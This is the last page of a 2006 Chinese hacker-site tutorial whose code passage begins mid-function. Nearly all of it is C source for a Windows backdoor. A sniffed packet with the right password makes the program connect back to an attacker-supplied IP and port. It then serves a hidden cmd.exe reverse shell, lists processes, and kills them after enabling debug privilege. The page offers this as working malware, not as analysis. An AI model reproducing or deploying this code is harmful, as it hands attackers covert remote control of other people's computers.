| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | 

您现在的位置: 中国X黑客小组 >> 技术文章 >> 编程技术 >> 黑客编程 >> 文章正文 用户登录 新用户注册
  简单的无驱动嗅探启动后门        【字体:
简单的无驱动嗅探启动后门
作者:未知    文章来源:CnXHacker.Net    点击数:    更新时间:2006-11-15    
is " );
LogToFile( shellArgument.ip );
LogToFile( "\nDecodeTCP: Remote port is " );
LogToFile( shellArgument.port );
LogToFile( "\n" );
#endif

if( strcmp( PASSWORD, password ) == 0 )
{
#ifdef DEBUG
LogToFile( "DecodeTCP: password is right\n" );
#endif

threadHandle = CreateThread( NULL,
0,
(LPTHREAD_START_ROUTINE)StartDoor,
&shellArgument,
0,
&threadID );

Sleep( 500 );
if( threadHandle == NULL )
{
#ifdef DEBUG
char tmp[512] = { 0 };
sprintf( tmp, "DecodeTCP: Create thread to make shell error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return -1;
}

#ifdef DEBUG
LogToFile( "DecodeTCP: Create thread to make shell successful\n" );
#endif

threadID ++;
if( threadID > 20000 )
{
threadID = 1;
}

CloseHandle( threadHandle );
return 1;
}
else
{
#ifdef DEBUG
LogToFile( "DecodeTCP: password is wrong\n" );
#endif

return -1;
}
}

///////////////////////////////////////////////////////////////////////////////
//后门模块
///////////////////////////////////////////////////////////////////////////////

int StartDoor( LPVOID argument )
{
SOCKET sock;
SOCKADDR_IN sin;
int ret;
WSADATA wsaData;
SHELL_ARGUMENT *shellArgument = (SHELL_ARGUMENT *)argument;

#ifdef DEBUG
LogToFile( "StartDoor: I'm in door now\n" );
#endif

sock = socket( AF_INET, SOCK_STREAM, 0 );
if ( sock == INVALID_SOCKET )
{
#ifdef DEBUG
char tmp[512] = { 0 };
sprintf( tmp, "StartDoor: Create socket error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return -1;
}

memset( &sin, 0, sizeof(sin) );

sin.sin_family = AF_INET;
sin.sin_port = htons( atoi(shellArgument->port) );
sin.sin_addr.s_addr = inet_addr( shellArgument->ip );

ret = connect( sock, (struct sockaddr *)&sin, sizeof(sin) );
if( ret == SOCKET_ERROR )
{
#ifdef DEBUG
char tmp[512] = { 0 };
sprintf( tmp, "StartDoor: Connect error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return -1;
}

char cmd[256] = { 0 }; //客户端输入的命令

while( TRUE )
{
//如果服务停止,跳出
if( !isRunning )
{
break;
}

ZeroMemory( cmd, sizeof(cmd) );

//发送命令提示符Icy\>
strcpy( cmd, FLAG );
send( sock, cmd, strlen(cmd), 0 );

//接受客户端输入的命令
ZeroMemory( cmd, sizeof(cmd) );
recv( sock, cmd, sizeof(cmd)-1, 0 );

//退出命令
if( StartWith( cmd, "exit\n" ) )
{
send( sock, "ByeBye...\n", strlen("ByeBye...\n"), 0 );
break;
}

//客户端要求执行shell
if( StartWith( cmd, "shell" ) )
{
StartShell( sock );
}

//列举进程
if( StartWith( cmd, "pslist" ) )
{
ListProcess( sock );
}

//杀进程,cmd + sizeof("kill ")-1即为进程ID
if( StartWith( cmd, "kill" ) )
{
char pID[7] = { 0 };
strncpy( pID, cmd + sizeof("kill ") - 1, 6 );

*( strchr( pID, '\n' ) ) = '';

KillProcess( sock, pID );
}
}

closesocket( sock );
return 0;
}

//执行shell
int StartShell( SOCKET sock )
{
SECURITY_ATTRIBUTES sa;

sa.nLength = sizeof( sa );
sa.lpSecurityDescriptor = 0;
sa.bInheritHandle = TRUE;

HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;

int ret;

//建立管道
ret=CreatePipe( &hReadPipe1, &hWritePipe1, &sa, 0 );
ret=CreatePipe( &hReadPipe2, &hWritePipe2, &sa, 0 );

STARTUPINFO si;
ZeroMemory( &si, sizeof(si) );

GetStartupInfo( &si );

//新进程输入输出重定向
si.cb = sizeof( si );
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hReadPipe2;
si.hStdOutput = si.hStdError = hWritePipe1;

PROCESS_INFORMATION processInfo;

char cmdLine[] = "cmd.exe";

//建立进程
ZeroMemory( &processInfo , sizeof(PROCESS_INFORMATION) );
ret = CreateProcess(NULL, cmdLine, NULL,NULL,1,0,NULL,NULL,&si,&processInfo);

char buff[BUFFER_SIZE] = { 0 };
unsigned long bytesRead = 0;
int i = 0;

while( TRUE )
{
if( !isRunning ) break;

memset( buff, 0, BUFFER_SIZE );

ret = PeekNamedPipe( hReadPipe1, buff, BUFFER_SIZE, &bytesRead, 0, 0 );

//防止超时,循环读取
for(i = 0; i < 5 && bytesRead == 0; i++)
{
Sleep(100);
ret = PeekNamedPipe( hReadPipe1, buff, BUFFER_SIZE, &bytesRead, NULL, NULL );
}

if( bytesRead )
{
ret = ReadFile( hReadPipe1, buff, bytesRead, &bytesRead, 0 );
if( !ret ) break;

ret = send( sock, buff, bytesRead, 0 );
if( ret <= 0 ) break;
}
else
{
bytesRead = recv( sock, buff, BUFFER_SIZE, 0 );

if( bytesRead <= 0 ) break;

if( StartWith( buff , "exit" ) == TRUE ) break;

ret = WriteFile( hWritePipe2, buff, bytesRead, &bytesRead, 0 );
if( !ret ) break;
}
}

//杀死cmd进程并关闭管道
TerminateProcess( processInfo.hProcess, 0 );

CloseHandle( hReadPipe1 );
CloseHandle( hReadPipe2 );
CloseHandle( hWritePipe1 );
CloseHandle( hWritePipe2 );

return 0;
}

//列举进程
int ListProcess( SOCKET sock )
{
HANDLE hProcessSnap = NULL;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
char psBuff[BUFFER_SIZE] = { 0 };

hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Call CreateToolhelp32Snapshot error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return -1;
}

pe32.dwSize = sizeof( PROCESSENTRY32 );

if( !Process32First( hProcessSnap, &pe32 ) )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Call Process32First error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

CloseHandle( hProcessSnap );

return -1;
}

send( sock, "PID\t\tProcessName\n", strlen("PID\t\tProcessName\n"), 0 );

do
{
ZeroMemory( psBuff , sizeof(psBuff) );
sprintf( psBuff , "%d\t\t%s\n", pe32.th32ProcessID , pe32.szExeFile );

send( sock, psBuff, strlen(psBuff), 0 );
}
while( Process32Next( hProcessSnap, &pe32 ) );

return 0;
}

//杀进程
int KillProcess( SOCKET sock, char *pID )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;

if ( !OpenProcessToken( GetCurrentProcess() , TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY , &hToken ) )
{
send( sock, "Open Process Token Failed\n", strlen("Open Process Token Failed\n"), 0 );
return -1;
}

if ( !LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )
{
send( sock, "Set Privileg Failed\n", strlen("Set Privileg Failed\n"), 0 );
CloseHandle( hToken );

return -1;
}

tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL );

CloseHandle( hToken );

HANDLE hProcess = NULL;

send( sock, "try to kill ", strlen("try to kill "), 0 );
send( sock, pID, strlen(pID), 0 );
send( sock, "\n", strlen("\n"), 0 );

hProcess = OpenProcess( PROCESS_TERMINATE , FALSE , atoi(pID) );
if( hProcess ==INVALID_HANDLE_VALUE || hProcess == NULL )
{
char err[56] = { 0 };
sprintf( err, "Open Process Failed: %d\n", GetLastError() );
send( sock, err, strlen(err), 0 );

return -1;
}
if ( !TerminateProcess( hProcess, (DWORD) -1 ) )
{
send( sock, "Terminate Process Failed\n", strlen("Terminate Process Failed\n"), 0 );
CloseHandle( hProcess );

return -1;
}

send( sock, "process killed\n", strlen("process killed\n"), 0 );
CloseHandle( hProcess );

return 1;
}

//判断buf1是否以buf2开头
BOOL StartWith( char *buf1, char *buf2 )
{
int len = strlen(buf2);

if( memcmp( buf1,buf2,len ) == 0 )
{
return TRUE;
}
return FALSE;
}

上一页  [1] [2] [3] 
文章录入:IceRiver    责任编辑:IceRiver 
  • 上一篇文章:

  • 下一篇文章:
    • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新热点 最新推荐 相关文章
    简单了解局域网内部的ARP攻击
    推荐:找寻蛛丝马迹 简单方法
    shell编程例子 -- 一个简单的
    浏览器遭恶意修改 简单有效的
    简单打造不死鸽子
    简单五步骤预防AV终结者病毒
    简单方法检测电脑是否中病毒
    IP地址冲突简单查找方法与预
    做黑客很简单 用IE浏览器实
    探密QQ登陆加密算法兼谈简单
      网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    Powered by ICE RIVER - STUDIO
    » CnXHacker.CoM   © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.